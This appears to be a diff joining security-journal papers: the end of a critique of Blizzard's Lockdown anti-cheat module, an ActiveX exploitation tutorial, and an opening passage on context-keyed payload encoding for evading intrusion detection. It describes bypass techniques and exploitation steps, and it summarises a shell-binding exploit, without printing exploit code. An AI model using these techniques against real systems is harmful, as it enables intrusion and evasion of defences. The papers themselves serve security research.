Reporting or a preconfigured JIT debugger in the event of a game crash,
depending on the implementation used. Ways of detecting debuggers include
calls to IsDebuggerPresent, NtQueryInformationProcess(...ProcessDebugPort..),
checks against NtCurrentPeb()->BeingDebugged, and soforth.
3. Duplication of checks (perhaps in slightly altered forms) throughout the
execution of the checksum implementation. It is important for this
duplication to be inline as much as possible in order to eliminate single
points of failure that could be used to short-circuit protection schemes by
an attacker.
4. Strengthening of the anti-debugging mechanism, as previously described.
3.3) Main Process Image Module Base Address Restriction
An attacker seeking to execute the Lockdown module in an untrusted process
would need to bypass the restrictions on the base address of the main process
image. The most likely approach to this would be a combination attack, whereby
the attacker would use something like a set of hardware breakpoints to alter
the hardcoded restrictions on module base addresses, and import table or code
patch style hooks on the GetModuleHandleA API in order to defeat the secondary
check on the module base address for the main executable image.
Another approach would be to simply create the main executable image as a
process, suspended, and then either create a new thread in the process or
assume control of the initial thread in order to execute the Lockdown module.
This gets the would-be attacker out of having to patch checks in the module, as
there is currently no defense against this case implemented in the module.
In order to strengthen this protection mechanism, the following approaches
could be taken:
1. Manually traverse the loaded module list (and examine the PEB) in order to
validate that the main process image is really at 0x00400000. All of these
mechanisms could be compromised, but checking each one creates additional
work for an attacker.
2. Verify that the game has initialized itself to some extent. This would
make the approach of creating the game process suspended more difficult. It
would also otherwise make the use of the Lockdown module in an untrusted
process more difficult without tricking the module into believing that it is
running in an initialized game process. The scope of determining how the
game is initialized is outside of this paper, although an approach similar
to the current one based on a checksum of Storm video memory (though with
more "redundancy", or an additional matrix of requirements for a legitimate
game process).
3.4) Minor Functional Differences Between Lockdown Module Flavors
Presently, an attacker needs to implement all flavors of the Lockdown module
in order to be assured of a successful connection to Battle.net. However,
even with the 20 possibilities now available, this is still not difficult due
to the minor functional differences between the different Lockdown flavors.
Moreso, it is trivially possible to find the "magic" constants that constitute
the only functional differences between each flavor of Lockdown.
In the author's tests, two pattern matches and a small 200-line C program were
all that were necessary to programmatically identify all of the magical
constants that represent the functional differences between each flavor of
Lockdown module, in a completely automated fashion. In fact, the author would
wager that it took more time to implement all 20 different flavors of Lockdown
modules than it took to devise and implement a rudimentary pattern matching
system to automagically discover all 20 magical constants from the set of 20
Lockdown module flavors. Clearly, this is not desirable from the standpoint
of effort put in to the protection scheme vs difficulty in attacking it.
In order to address these weaknesses, the following steps could be implemented:
1. Implement true, major functional differences between Lockdown flavors.
Instead of using a single constant value that is different between each
flavor (probably a "" preprocessor constant), implement other,
real functional differences. Otherwise, even with a number of different
"non-functional" differences between module flavors, a pattern-matching
system will be able to quickly locate the different constants for each
module after a human attacker has discovered the constant for at least one
module flavor.
2. Avoid using quick-to-substitute constants as the "meat" of the functional
differences betwene flavors. While these are convenient from a development
perspective, they are also convenient from an attacker perspective. If a
bit more time were spent from a development perspective, attackers could be
made to do real analysis of each module separately in order to determine the
actual functional differences, greatly increasing the amount of time that is
required for an attacker to defeat this protection scheme.
3.5) Spoofed Return Address for CheckRevision Calls
Due to how the x86 architecture works, it is trivially easy to spoof the return
address pointer for a procedure call. All that one must do is push the spoofed
return address on the stack, and then immediately execute a direct jump to the
target procedure (as opposed to a standard call).
As a result, it is fairly trivial to bypass this protection mechanism at
run-time. One need only search for a `ret' opcode in the code space of the
Battle.snp module in memory, and use the technique described previously to
simply "bounce" the call off of Battle.snp via the use of a spoofed return
address. To the Lockdown module, the call will appear to originate from the
context of Battle.snp, but in reality the call will immediately return from
Battle.snp to the real caller in the untrusted process.
To counter this, the following could be attempted:
1. Verify two return addresses deep, although due to the nature of the x86
calling conventions (at least stdcall and fastcall, the two used by
Blizzard code frequently), it is not guaranteed that four bytes past the
return address will be a particularly meaningful value.
2. Verify that the return address does not point directly to a `ret', `jmp',
`call' or similar instruction, assuming that current Battle.snp variations do
not use such patterns in their call to the module. This only slightly raises
the bar for an attacker, though; he or she would only need pick a more
specific location in Battle.snp through which to stage a call, such as the
actual location used in normal calls to the Lockdown module.
3.6) Limited Pool of Challenge/Response Tuples
Presently, the Battle.net servers contain a fairly limited pool of possible
challenge/response pairs for the version check and authentication system.
Observations suggest that most products have a pool of around one thousand
values that can be sent to clients. This has been used against Battle.net in
the past, which was countered by an increase to 20000 possible values for
several Battle.net products. Even with 20000 possible values, though, it is
still possible to capture a large number of logon attempts over time and build
a lookup table of possible values. This is an attractive option for an
attacker, as he or she need only perform passive analysis over a period of time
in order to construct a database capable of logging on to Battle.net with a
fairly high success rate. Given the relative infrequency of updates to the
pool of version check values (typically once per patch), this is considered to
be a fairly viable method for an attacker to bypass the version check and
authentication system.
This limitation could easily be addressed by Blizzard, however, such as through
the implementation of one or more of the below suggestions:
1. Periodically rotate the set of possible version check values so as to ensure
that a database of challenge/response pairs would quickly expire and need to
be rebuilt. Combined with a large pool of possible values, this approach
would greatly reduce the practicality of this attack. Unfortunately, the
author suspects that this would require manual intervention each time the
pools were to be rotated by the part of Blizzard in the current Battle.net
server implementation.
2. Implement dynamic generation of pool values at runtime on each Battle.net
server. This would require the server to have access to the requisite client
binaries, but is not expected to be a major challenge (especially since the
author suspects that Battle.net is powered by Windows already, which would
allow the existing Lockdown module code to be cleaned up and repackaged for
use on the server as well). This could be implemented as a pool of possible
values that is simply stirred every so often; new challenge/response values
need not necessarily be generated on each logon attempt (and doing so would
have undesirable performance implications in any case).
4) Conclusion
Although the Lockdown module and associated authentication system represent
a major break in Blizzard's ongoing battle against non-genuine Battle.net
client software, there are still many improvements that could be made in a
future release of the version check and authentication system which would fit
within the constraints imposed on the version check system, and still pose a
significant challenge to an adversary attempting to spoof Battle.net logons
using a non-genuine clients. The author would encourage Blizzard to consider
and implement enhancements akin to those described in this paper, particularly
protections that overlap and complement each other (such as the debug register
clearing and memory checksum schemes).
In the vein of improving the Lockdown system, the author would like to stress
the following principles as especially important in creating a system that is
difficult to defeat and yet still workable and viable from a development and
deployment perspective:
- Defense in depth with respect to the various protection mechanisms in place
within the module is a must. Protection systems need to be designed to
complement and reinforce eachother, such that an attacker must defeat a
number of layers of protection schemes for any one significant attack to
succeed to the point of being a break in the system.
- Countermeasures intended to frustrate reverse engineering or easy duplication
of critical algorithms need to be viewed in the light of what an adversary
might do in order to 'attack' (or duplicate, re-implement, or whatnot) a
'guarded' (or otherwise important) algorithm or section of code. For
example, an attacker could ease the work of reimplementing parts of an
algorithm or function of interest by wholesale copying of assembler code
into a different module, or by loading an "authentic" module and making
direct calls into internal functions (or the middle of internal functions) in
an effort to bypass "upstream" protection checks. Keeping with this line of
thinking, it would be advisible to interleave protection checks with code
that performs actual useful work to a certain degree, such that it is less
trivial for an adversary to bypass protection checks that are entirely done
"up front" (leaving the remainder of a secret algorithm or function
relatively "vulnerable", if the check code is skipped entirely).
- Countermeasures intended to create "time sinks" for an adversary need to be
carefully designed such that they are not easily bypassed. For instance, in
the current Lockdown module implementation, there are twenty flavors of the
Lockdown module; yet, in this implementation, it is trivially easy for an
adversary to discover the differences (in a largely programmatic fashion),
making this "time sink" highly ineffective, as the time for an adversary to
breach it is likely much less than the time for the original developers to
have created it.
- Measures that depend on external, imported APIs are often relatively easy for
an attacker to quickly pinpoint and disable (for example, the method that
debug register breakpoints are disabled by the Lockdown module is
immediately obvious to an adversary, if they are even the least bit familiar
with the Win32 API (which must be assumed). In some cases (such as with the
debug register breakpoint clearing code), this cannot be avoided, but in
others (such as validation of module base addresses), the same effect could
be potentially implemented by use of less-obvious approaches (for example
manually traversing the loaded module list by locating the PEB and the
loader data structures from the backlink pointer in the current thread's
TEB). The author would encourage the developers of additional defensive
measures to reduce dependencies on easily-noticible external APIs as much as
possible (balanced, of course, against the need for maintainable code that
executes on all supported platforms). In some instances, such as the manual
resolution of Storm symbols, the current system does do a fair job of
avoiding easily-detectable external API use.
All things considered, the Lockdown system represents a major step forward in
the vein of guarding Battle.net from unauthorized clients. Even so, there is
still plenty of room for improvements in potential future revisions of the
system. The author hopes that this article may prove useful in the
strengthening of future defensive systems, by virtue of a thorough accounting
of the strengths and weaknesses in the current Lockdown module (and pointed
suggestions as to how to repair certain weaker mechanisms in the current
implementation).

297
uninformed/9.2.txt Normal file
View File

@ -0,0 +1,297 @@
ActiveX - Active Exploitation
01/2008
warlord
warlord@nologin.org
http://www.nologin.org
Share what I know, learn what I don't
1) Foreword
First of all, I'd like to explain what this paper is all about, and
especially, what it is not. A few months ago I got into the technical details
of ActiveX for the first time. Prior to this point I only had some vague
ideas and a general understanding of what it is and how it works. What I did
first is probably quite obvious: I googled. To my surprise though, I could
not find a single paper discussing ActiveX and how to exploit it. My next step
was to contact some generally smart and knowledgable friends to harvest the
required information from them. I was even more surprised to find that some of
the most skilled people out there lacked the same knowledge that I did.
Perhaps it's our common background, coming from the Unix/Linux world, but
whatever the reason, I had to work to collect the information I now possess.
But still, I feel like I'm the one-eyed man explaining what the world looks
like to the blind.
The fact that there are tons of ActiveX exploits on Milw0rm which would
suggest that the knowledge is out there by now. I wonder why no one took the
time to write it all up so the less knowledgable may get into this theater as
well. It's the intention of this paper to fill this gap. If you already know
everything about ActiveX, if you've found your own 0day and exploited it
successfully, I probably can't teach you any new tricks. Everyone else I
invite to read on.
2) Introduction
ActiveX[1] is a Microsoft technology introduced in 1996 and based on
the Component Object Model (COM) and Object Linking and Embedding (OLE)
technologies. The intention of COM has been to create easily reusable pieces of
code by creating objects that offer interfaces which can be called by other
COM objects or programs. This technology is widely used for what
Microsoft calls ActiveX[2] which represents the integration of COM
into Internet Explorer. This integration offers the ability to interface
with Windows as well as third-party applications with the MS browser. This
allows for the easy extension of functionality in the Internet Explorer by
giving software developers the ability to create complex applications which
can interface with websites through the browser.
There are various ways for an ActiveX control to end up on any given machine.
Besides all the controls which are part of IE or the operating system,
programs may install and register ActiveX controls of their own to offer a
diverse set of functions in IE. Another way of installing a new control is
through web sites themselves. Depending on Internet Explorer security
settings, a website may try to instantiate a control, for example Shockwave
Flash, and failing to do so may prompt the user to install the Shockwave Flash
ActiveX control.
Security issues seems to be a constant problem with ActiveX controls.
In fact, it seems most vulnerabilities in Windows nowadays are actually due to
poorly-written third-party controls which allow malicious websites to exploit
buffer overflows or abuse command injection vulnerabilities. Quite often
these controls make the impression of their authors not having realized their
code can be instantiated from a remote website.
The following chapters will describe methods to find, analyze, and exploit
bugs in ActiveX controls will be presented to the reader.
3) Control and functionality enumeration
Any given Windows installation is likely to have a significant number of
registered COM objects. For the purpose of this paper, however, we are only
interested in controls which may be instantiated from a website. Quite a
number of the following details are taken out of the excellent "The Art
of Software Security Assessment"[3], a book I strongly recommend to
anyone interested in application security.
ActiveX controls are usually, but not always, instantiated by passing their
CLSID to CoCreateInstance. The respective class identifier (CLSID) is used as
a unique value which is associated with each control in order to distinguish
it from its peers. A list of all the existing CLSIDs on a given Windows
installation can be found in the registry in HKEY_CLASSES_ROOT\CLSID, which
actually is nothing but an alias to HKEY_LOCAL_MACHINE\Software\Classes\CLSID.
Within the CLSID key there are thousands of different class identifiers, all
of them specifying ActiveX controls. However, only a subset of those can be
instantiated by a website. Controls marked as safe for scripting are granted
this ability. To determine whether a certain control has this ability, it has
to be part of the respective category. Specifically, the category can be
found in the registry in the form: HKEY_CLASSES_ROOT\CLSID\<control
clsid>\Implemented Categories. If a control is safe for scripting it may
indicate this by having a subkey with the GUID
7DD95801-9882-11CF-9FA9-00AA006C42C4. Similarly, the 'safe for initialization'
category is listed in the same location, but with a slightly different GUID.
Its value is 7DD95802-9882-11CF-9FA9-00AA006C42C4.
In the end though, not being part of these categories doesn't necessarily mean
that a control cannot be called from IE. The component may dynamically report
itself as being safe for scripting when it is instantiated through IE. The
only surefire way is to try and instantiate a control and see if it can be
used. Axman[5] is an ActiveX fuzzer written by HD Moore which can automate this
check for all of the different CLSIDs on a system. Another tool to enumerate
the controls in question is iDefense's ComRaider[4], another ActiveX fuzzer,
which has the ability to build a database of controls that IE should be able
to instantiate.
3.1) ProgIDs
Besides the long and rather hard to memorize CLSID there is often a second
way of instantiating a certain control. This can be accomplished through the
use of a control's program ID (progID). Quite similar to IP addresses and the
domain name system(DNS), progIDs can be looked up to determine the matching
CLSID. Once the right one has been determined, Internet Explorer goes on as
if the CLSID had been provided in the first place.
For this technique to work for a given control, two requirements must be met.
First, a control must have a ProgID subkey under their CLSID key in the
register. ProgIDs are usually in the form Program.Component.Version such as
SafeWia.Script.1. Second, as there is no point for Windows to walk through up
to 2700 CLSIDs(in my example) to find the specified ProgID, the program ID
itself must have a key in HKEY_CLASSES_ROOT with a subkey named CLSID which
describes makes the association.
3.2) The Kill Bit
In some cases it is desirable to restrict a control from ever being
instantiated in IE. This can be accomplished through the use of a
kill bit. The kill bit can be defined by setting the 0x00000400 bit
in the DWORD associated with a given CLSID:
HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\<CLSID>
3.3) User Specific Controls
With Windows XP, Microsoft introduced support for user-specific ActiveX
controls. These do not require Administrator-level access to install because
the controls are specific to a certain user, as the name already implies.
These controls can be found under HKEY_CURRENT_USER\Software\Classes. While
this functionality exists, most ActiveX controls are installed globally.
3.4) Determining Exported Functions
ActiveX controls implement various COM interfaces in the same manner as any
other COM object. COM interfaces are well-defined definitions of what
functions and properties a COM class must implement and support. COM provides
the ability to dynamically query a COM class at runtime using QueryInterface
to see what interfaces it implements. This is how IE determines if a control
supports the safe for scripting interface (which is called IObjectSafety).
4) Examples
4.1) MW6 Technologies QRCode ActiveX 3.0
In this section the previously provided information will be demonstrated with
the help of a recent public ActiveX vulnerability and exploit. The vulnerable
control is from a company called WM6 and comes with their ``QRCode ActiveX''
version 3.0. When I downloaded the software in January 2008, several months
after the exploit was posted on Milw0rm in September, the vulnerable control
was still part of the package.
The control itself has a CLSID of 3BB56637-651D-4D1D-AFA4-C0506F57EAF8. After the
installation of the software, it can be found in the registry in:
HKEY_CLASSES_ROOT\CLSID\{3BB56637-651D-4D1D-AFA4-C0506F57EAF8}
The DLL that implements this control can be found on the harddrive in the file
that is specified in the "InprocServer32" key. In this example it is:
C:\WINDOWS\system32\MW6QRC~1.DLL
There are two interesting things to note here. For one, the ProgID key has a
default value of MW6QRCode.QRCode.1. At the ProgID's corresponding location in
the registry, namely HKCR\MW6QRCode.QRCode.1, the CLSID subkey contains the
CLSID of that control. This tells us that this control can be instantiated
using both its CLSID and ProgID. Another point of interest in the screenshot
is the absence of the "Implemented Categories" key. This means that this
control is neither part of the "safe for scripting" nor the "safe for
initialization" category. However, it appears that the control must implement
IObjectSafety since it is still possible to instantiate the control from IE.
The following simple HTML code tries to instantiate the control.
<body>
<object classid='clsid:3BB56637-651D-4D1D-AFA4-C0506F57EAF8' id='test'>
</object>
</body>
The result of this snippet of code is the appearance of a little picture in IE.
As this works just fine without Internet Explorer complaining about being
unable to load the control, the next examination step is in order.
4.1.1) Enumerating Exported Interfaces
By now it has been shown that the example control can be instantiated from IE
just fine. The question now is what kind of interfaces the control provides to
the caller. By submitting the specific CLSID of the control that is to be
examined to ComRaider, the tool lists all of the controls implemented
functions as well as the kind and number of expected parameters. An
alternative to ComRaider is the so-called OLE-COM object viewer that comes
with the platform SDK and Visual Studio.
4.1.2) Exploitation
After playing around with various functions, it soon becomes obvious that
SaveAsBMP and SaveAsWMF happily accept any path provided to save the
generated graphic in the specified location. This can make it possible to
overwrite existing files with the picture if the user running IE has
sufficient access. This is a perfect example of a program using untrusted
data and operating on it without any kind of checks. It is likely that the
control's author did not consider the security implications of what they were
doing.
A sample exploit for this vulnerability, written by shinnai, can be found on
Milw0rm: http://www.milw0rm.com/exploits/4420.
4.2) HP Info Center
On December 12th, 2007, a vulnerability in an ActiveX control which was
shipped by default with multiple series of Hewlett Packard notebooks was
disclosed. The issue itself was found in a piece of software called the HP
Info Center. The vulnerability allowed remote read and write access to the
registry as well as the execution of arbitrary commands. By instantiating
this control in Internet Explorer and calling the vulnerable functions it was
possible to run software with the same level of access as the user running IE.
Porkythepig found and disclosed this serious threat and wrote a detailed
report as well as a sample exploit covering three attack vectors.
The HP control with the CLSID 62DDEB79-15B2-41E3-8834-D3B80493887A was
responsible for the listed vulnerabilities. By default it installs itself into
C:\Program Files\Hewlett-Packard\HP Info Center. In his advisory, porky
listed three potentially insecure methods as well as the expected parameters:
- VARIANT GetRegValue(String sHKey, String sectionName, String keyName);
- void SetRegValue(String sHKey, String sSectionName, String sKeyName, String sValue);
- void LaunchApp(String appPath, String params, int cmdShow);
While the first and second method allow for remote read and write access to
the registry, the third function runs arbitrary programs. For example, an
attacker could execute cmd.exe with arbitrary arguments.
In this example the vulnerable control provided remote access to the victims
machine. Sample code to exploit all three functions can once again be found on
Milw0rm: http://www.milw0rm.com/exploits/4720.
4.3) Vantage Linguistics AnswerWorks
The third and last example of various ActiveX vulnerabilities is in the
Vantage Linguistics AnswerWorks. Advisories covering this vulnerability were
released in December, 2007. The awApi4.AnswerWorks.1 control exports several
functions which are prone to stack-based buffer overflows. The functions
GetHistory(), GetSeedQuery(), and SetSeedQuery() fail to properly handle long
strings provided by a malicious website. The resulting stack-based buffer
overflow allows for the execution of arbitrary code, as "e.b." demonstrates
with a proof of concept that binds a shell to port 4444 when the exploit
succeeds.
When the exploit is loaded from a webserver it instatiates the CLSID and links
the created object to a variable named obj. It then calls the GetHistory()
function with a carefully crafted string which consists of 214 A's to fill the
buffer followed by a return address which overwrites the one saved on the
stack. After those 4 bytes come 12 NOPs and then finally the shellcode. As
one can easily see, this exploit is based on the same techniques that can be
seen in many other stack-based exploits.
The exploit mentioned in this example can also be found on Milw0rm:
http://www.milw0rm.com/exploits/4825.
5) Summary
This paper has provided a brief introduction to ActiveX. The focus has been
on discussing some of the underlying technology and security related issues
that can manifest themselves. This was meant to equip the reader with enough
background knowledge to examine ActiveX controls from a security point of
view. The author hopes he managed to describe the big picture in enough detail
to provide readers with enough information on the matter to base further
research on the aquired knowledge.
5.1) Acknowledgements
wastedimage - For answering the first questions
deft - For providing lots of answers and examples
rjohnson - For filling in details deft forgot to mention
skape - For background knowledge on underlying functions
hdm - For knowing all the rest
References
[1] ActiveX Controls @ Wikipedia
http://en.wikipedia.org/wiki/ActiveXcontrol
[2] ActiveX Controls
http://msdn2.microsoft.com/en-us/library/aa751968.aspx
[3] The art of software security assessment
http://taossa.com
[4] ComRaider
http://labs.idefense.com/software/fuzzing.php#morecomraider
[5] Axman ActiveX Fuzzer
http://www.metasploit.com/users/hdm/tools/axman/

679
uninformed/9.3.txt Normal file
View File

@ -0,0 +1,679 @@
Context-keyed Payload Encoding
Preventing Payload Disclosure via Context
October, 2007
I)ruid, C²ISSP
druid@caughq.org
http://druid.caughq.org
Abstract
A common goal of payload encoders is to evade a third-party detection mechanism which
is actively observing attack traffic somewhere along the route from an attacker
to their target, filtering on commonly used payload instructions. The use of
a payload encoder may be easily detected and blocked as well as opening up the
opportunity for the payload to be decoded for further analysis. Even
so-called keyed encoders utilize easily observable, recoverable, or guessable
key values in their encoding algorithm, thus making decoding on-the-fly
trivial once the encoding algorithm is identified. It is feasible that an
active observer may make use of the inherent functionality of the decoder stub
to decode the payload of a suspected exploit in order to inspect the contents
of that payload and make a control decision about the network traffic. This
paper presents a new method of keying an encoder which is based entirely on
contextual information that is predictable or known about the target by the
attacker and constructible or recoverable by the decoder stub when executed at
the target. An active observer of the attack traffic however should be unable
to decode the payload due to lack of the contextual keying information.
1) Introduction
In the art of vulnerability exploitation there are often numerous hurdles that
one must overcome. Examples of hurdles can be seen as barriers to traversing
the attack vector and challenges with developing an effective vulnerability
exploitation technique. A critical step in the later inevitabley requires the
use of an exploit payload, traditionally referred to as shellcode. A payload
is the functional exploit component that implements the exploit's purpose[1].
One barrier to successful exploitation may be that including certain byte
values in the payload will not allow the payload to reach its destination in
an executable form[2], or even at all. Another hurdle to overcome may be that an
in-line network security monitoring device such as an Intrusion Prevention
System (IPS) could be filtering network traffic for the particular payload
that the exploit intends to deliver[3, 288-289], or otherwise extracting the
payload for further automated analysis[4][5, 2]. Whatever the hurdle may be,
many challenges relating to the payload portion of the exploit can be overcome
by employing what is known as a payload encoder.
1.1) Payload Encoders
Payload encoders provide the utility of obfuscating the exploit's payload
while it is in transit. Once the payload has reached its target, the payload
is decoded prior to execution on the target system. This allows the
payload to bypass various controls and restrictions of the type mentioned
previously while still remaining in an executable form. In general, an
exploit's payload will be encoded prior to packaging in the exploit itself
and what is known as a decoder stub will be prepended to the
encoded payload which produces a new, slightly larger payload. This new
payload is then packaged within the exploit in favor of the original.
1.1.1) Encoder
The encoder can take many forms and provide its function in a number of
different ways. At its most basic definition, an encoder is simply a function
used when packaging a payload for use by an exploit which encodes the payload
into a different form than the original. There are many different encoders
available today, some of which provide encoding such as alphanumeric
mixed-case text[6], Unicode safe mix-cased text[7], UTF-8 and tolower()
safe[2], and XOR against a 4-byte key[8]. There is also an extremely
impressive polymorphic XOR additive feedback encoder available called Shikata
Ga Nai[9].
1.1.2) Decoder Stub
The decoder stub is a small chunk of instructions that is prepended to the
encoded payload. When this new payload is executed on the target system, the
decoder stub executes first and is responsible for decoding the original
payload data. Once the original payload data is decoded, the decoder stub
passes execution to the original payload. Decoder stubs generally perform a
reversal of the encoding function, or in the case of an XOR obfuscation
encoding, simply perform the XOR again against the same key value.
1.1.3) Example: Metasploit Alpha2 Alphanumeric Mixedcase Encoder (x86)
The Metasploit Alpha2 Alphanumeric Mixedcase Encoder[6] encodes payloads as
alphanumeric mixedcase text using SkyLined's Alpha2 encoding suite. This
allows a payload encoded with this encoder to traverse such attack vectors as
may require input to pass text validation functions such as the C89 standard
functions isalnum() and isprint(), as well as the C99 standard function
isascii().
1.1.4) Keyed Encoders
Many encoders utilize encoding techniques which require a key value. The
Call+4 Dword XOR encoder[8] and the Shikata Ga Nai polymorphic XOR additive
feedback encoder[9] are examples of keyed encoders.
Key Selection
Encoders which make use of key data during their encoding process have
traditionally used either random or static data chosen at the time of
encoding, or data that is tied to the encoding process itself[10], such as the
index value of the current position in the buffer being operated on, or a
value relative to that index.
Example: Metasploit Single-byte XOR Countdown Encoder (x86)
The Metasploit Single-byte XOR Countdown Encoder[10] uses the length of the
remaining payload to be operated upon as a position-dependent encoder key.
The benefit that this provides is a smaller decoder stub, as the decoder stub
does not need to contain any static keying information. Instead, it tracks
the length property of the payload as it decodes and uses that information as
the key.
Weaknesses
The most significant weakness of most keyed encoders available today is that
the keying information that is used is either observable directly or
constructable from the observed decoder stub. Either the static key
information is transmitted within the exploit as part of the decoder stub
itself, or the key information is reproducible once the encoding algorithm is
known. Knowledge of the encoding algorithm is usually obtainable by
recognizing known decoder stubs or analyzing unknown decoder stubs
instructions in detail.
The expected inherent functionality of the decoder stub also introduces a
weakness. Modern payload encoders rely upon the decoder stub's ability to
properly decode the payload at run-time. It is feasible that an active
observer may exploit this inherent functionality to decode a suspected payload
within a sandbox environment in real-time[5,3] in order to inspect the contents of
the payload and make a control decision about the network traffic it was found
in. Because the decoder stub requires only that it is being executed by a
processor that will understand its instruction-set, producing such a sandbox
is trivial.
Unfortunately, all of the aforementioned keyed encoders include the static key
value directly in their decoder stubs and are thus vulnerable to the
weaknesses described here. This allows an observer of the encoded payload in
transit to potentially decode the payload and inspect it's content.
Fortunately, all of the keyed encoders previously mentioned could potentially
be improved to use contextual keying as is described in the following chapter.
2) Contextual Keying
Contextual keying is defined as the process of selecting an encoding key from
context information that is either known or predictable about the target. A
context-key is defined as the result of that process. The context information
available about the exploit's target may contain any number of various types
of information, dependent upon the attacker's proximity to the target,
knowledge of the target's operation or internals, or knowledge of the target's
environment.
2.1) Encoder
When utilizing a context-key, the method of encoding is largely unchanged from
current methods. The exploit crafter simply passes the encoding function the
context-key as its static key value. The size of the context-key is dependent
upon the requirements of the encoder being used; however, it is feasible that
the key may be of any fixed length, or ideally the same size as the payload
being encoded.
2.2) Decoder Stub
The decoder stub that requires a context-key is not only responsible for
decoding the encoded payload but is also responsible for retrieving or
otherwise generating its context-key from the information that is available to
it at run-time. This may include retrieving a value from a known memory
address, performing some calculation on other information available to it, or
any number of other possible scenarios. The following section will explore
some of the possibilities.
2.3) Application Specific Keys
2.3.1) Static Application Data
If the attacker has the convenience of reproducing the operating environment
and execution of the target application, or even simply has access to the
application's executable, a context-key may be chosen from information known
about the address space of the running process. Known locations of static
values such as environment variables, global variables and constants such as
version strings, help text, or error messages, or even the application's
instructions or linked library instructions themselves may be chosen from as
contextual keying information.
Profiling the Application
To successfully select a context-key from a running application's memory, the
application's memory must first be profiled. By polling the application's
address space over a period of time, ranges of memory that change can be
eliminated from the potential context-key data pool. The primary requirement
of viable data in the process's memory space is that it does not
change over time or between subsequent instantiations of the running
application. After profiling is complete, the resultant list of memory
addresses and static data will be referred to as the application's
memory map.
Memory Map Creation
The basic steps to create a comprehensive memory map of a running process are:
1. Attach to the running process.
2. Initialize the memory map with a poll of non-null bytes in the running
process's virtual memory.
3. Wait an arbitrary amount of time.
4. Poll the process's virtual memory again.
5. Find the differential between the contents of the memory map and the most
recent memory poll.
6. Eliminate any data that has changed between the two from the memory map.
7. Optionally eliminate any memory ranges shorter than your desired key length.
8. Go to step 3.
Continue the above process until changing data is no longer being eliminated
and store the resulting memory map as a map of that instance of the target
process. Restart the application and repeat the above process, producing a
second memory map for the second instance of the target process. Compare the
two memory maps for differences and again eliminate any data that differs.
Repeat this process until changing data is no longer being eliminated.
The resulting final memory map for the process must then be analyzed for
static data that may be directly relative to the environment of the process
and may not be consistent across processes running within different
environments such as on different hosts or in different networks. This type
of data includes network addresses and ports, host names, operating system
"unames", and so forth. This type of data may also include installation
paths, user names, and other user-configurable options during installation of
the application. This type of data does not include application version
strings or other pertinent information which may be directly relative to the
properties of the application which contribute to the application being
vulnerable and successfully exploited.
Identifying this type of information relative to the application's environment
will produce two distinct types of memory map data; one type containing static
application context data, and the other type containing environment context
data. Both of these types of data can be useful as potential context-key
values, however, the former will be more portable amongst targets whereas the
latter will only be useful when selecting key values for the actual target
process that was actively profiled. If it is undesirable, introducing
instantiation of processes being profiled on different network hosts and with
different installation configuration options to the memory map generation
process outlined above will likely eliminate the latter from the memory map
entirely.
Finally, the memory maps can be trimmed of any remaining NULL bytes to reduce
their size. The final memory map should consist of records containing memory
addresses and the string of static data which can be found in memory at those
locations.
Memory Map Creation Methods
Metasploit Framework's msfpescan
One method to create a memory map of viable addresses and values is to use a
tool provided by the Metasploit Framework called msfpescan. msfpescan is
designed to scan PE formatted executable files and return the requested
portion of the .text section of the executable. Data found in the .text
section is useful as potential context-key data as the .text section is marked
read-only when mapped into a process' address space and is therefore static
and will not change. Furthermore, msfpescan predicts where in the executed
process' address space these static values will be located, thus providing
both the static data values as well as the addresses at which those values can
be retrieved.
To illustrate, suppose a memory map for the Windows System service needs to be
created for exploitation of the vulnerability described in Microsoft Security
Bulletin MS06-040[11] by an exploit which will employ a context-keyed payload
encoder. A common DLL that is linked into the service's executable when
compiled can be selected as the target for msfpescan. In this case,
ws2help.dll is chosen due to its lack of updates since August 23rd, 2001.
Because this particular DLL has remained unchanged for over six years, its
instructions provide a particularly consistent cache of potential context-keys
for an exploit targeting an application linked against it anytime during the
last six years. A scan of the first 1024 bytes of ws2help.dll's executable
instructions can be performed by executing the following command:
msfpescan -b 0x0 -A 1024 ws2help.dll
Furthermore, msfpescan has been improved via this research effort to render
data directly as a memory map. This improved version is available in the
Metasploit Framework as of version 3.1. A scan and dump to memory map of
ws2help.dll's executable instructions can be performed by executing the
following command:
msfpescan --context-map context ws2help.dll
It is important to note that this method of memory map generation is much less
comprehensive than the method previously outlined; however, when targeting a
process whose executable is relatively large and links in a large number of
libraries, profiling only the instruction portions of the executable and
library files involved may provide an adequately-sized memory map for
context-key selection.
Metasploit Framework's memdump.exe
The Metasploit Framework also provides another useful tool for the profiling
of a running process' memory called memdump.exe. memdump.exe is used to dump
the entire memory space of a running process. This tool can be used to
provide the polling step of the memory map creation process previously
outlined. By producing multiple memory dumps over a period of time, the dumps
can be compared to isolate static data.
smem-map
A tool for profiling a Linux process' address space and creating a memory map
is provided by this research effort. The smem-map tool[12] was created as a
reference implementation of the process outlined at the beginning of this
section. smem-map is a Linux command-line application and relies on the proc
filesystem as an interface to the target process' address space.
The first time smem-map is used against a target process, it will populate an
initial memory map with all non-null bytes currently found in the process's
virtual memory. Subsequent polls of the memory ranges that were initially
identified will eliminate data that has changed between the memory map and the
most recent poll of the process's memory. If the tool is stopped and
restarted and the specified memory map file exists, the file will be reloaded
as the memory map to be compared against instead of populating an entirely new
memory map. Using this functionality, a memory map can be refined over
multiple sessions of the tool as well as multiple instantiations of the target
process. A scan of a running process' address space can be performed by
executing the following command:
smem-map <PID> output.map
Context-Key Selection
Once a memory map has been created for the target application, the encoder may
select any sequential data from any memory address within the memory map which
is both large enough to fill the desired key length and also does not produce
any disallowed byte values in the encoded payload as defined by restrictions
to the attack vector for the vulnerability. The decoder stub should then
retrieve the context-key from the same memory address when executed at the
target. If the decoder stub is developed so that it may read individual bytes
of data from different locations, the encoder may select individual bytes from
multiple addresses in the memory map. The encoder must note the memory
address or addresses at which the context-key is read from the memory map for
inclusion in the decoder stub.
Proof of Concept: Improved Shikata ga Nai
The Shikata ga Nai encoder[9], included with the Metasploit Framework, implements
polymorphic XOR additive feedback encoding against a four byte key. The
decoder stub that is prepended to a payload which has been encoded by Shikata
ga Nai is generated based on dynamic instruction substitution and dynamic
block ordering. The registers used by the decoder stub instructions are also
selected dynamically when the decoder stub is constructed.
Improving the original Metasploit implementation of Shikata ga Nai to use
contextual keying was fairly trivial. Instead of randomly selecting a four
byte key prior to encoding, a key is instead chosen from a supplied memory
map. Furthermore, when generating the decoder stub, the original
implementation used a "mov reg, val" instruction (0xb8) to move the key value
directly from its location in the decoder stub into the register it will use
for the XOR operation. The context-key version instead uses a "mov reg,
